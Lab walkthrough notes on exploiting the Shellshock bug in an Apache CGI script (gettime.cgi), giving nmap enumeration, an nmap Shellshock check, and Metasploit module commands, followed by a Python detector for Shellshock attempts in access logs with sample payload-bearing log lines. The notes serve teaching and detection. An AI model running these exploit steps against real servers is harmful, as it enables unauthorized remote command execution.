Metasploit Exploitation

#Enumeration

nmap -sV 192.173.104.3
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
  • Check the website via a browser:

    • http://192.173.104.3/

  • View Page Source

    • http://192.173.104.3/gettime.cgi

    • The gettime.cgi script can be utilized as the attack vector

  • Check if the server is vulnerable to ShellShock

nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.173

#Metasploit

search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target IP address>
set TARGETURI /gettime.cgi
exploit
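
Both the nmap check and the Metasploit module above send a Bash function definition (beginning `() {`) in an HTTP request header to gettime.cgi, and Apache's combined access log records the Referer and User-Agent headers. The following detection check is an added example, not part of the original notes; it assumes the combined log format, and the function name and log lines are constructed for illustration.

```python
import re

# Apache "combined" LogFormat (assumed):
#   host ident user [time] "request" status bytes "referer" "user-agent"
# Apache writes a literal quote inside a logged value as \", hence (?:[^"\\]|\\.)*
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)
# Start of a Bash function definition, tolerant of spacing: "() {", "(){", "( ) {"
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log (documentation-range client addresses, harmless marker payload).
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /gettime.cgi HTTP/1.1" 200 45 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /gettime.cgi HTTP/1.1" 200 45 "-" "() { :; }; echo; echo constructed-marker"
192.0.2.77 - - [01/Jan/2024:10:00:06 +0000] "GET /gettime.cgi HTTP/1.1" 200 45 "(){ :;}; echo constructed-marker" "curl/8.0"
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 512 "http://192.173.104.3/" "Mozilla/5.0 (X11; Linux x86_64)"
'''

def find_shellshock_attempts(log_text):
    """Return a dict per log line that carries a function-definition prefix."""
    hits = []
    for lineno, line in enumerate(log_text.strip().splitlines(), 1):
        m = COMBINED.match(line.strip())
        if m:
            host, request, status, referer, agent = m.groups()
            named = {"request": request, "referer": referer, "agent": agent}
            fields = [k for k, v in named.items() if FUNC_DEF.search(v)]
        else:
            # Unparsable line: scan it whole instead of skipping it silently.
            host = status = None
            fields = ["raw"] if FUNC_DEF.search(line) else []
        if fields:
            # status is the response code only; it does not show whether the payload ran.
            hits.append({"line": lineno, "host": host, "status": status, "fields": fields})
    return hits

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

A hit records an attempt, not a successful execution. Headers that the combined format does not log, such as Cookie, are only visible if the LogFormat is extended (for example with `%{Cookie}i`).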
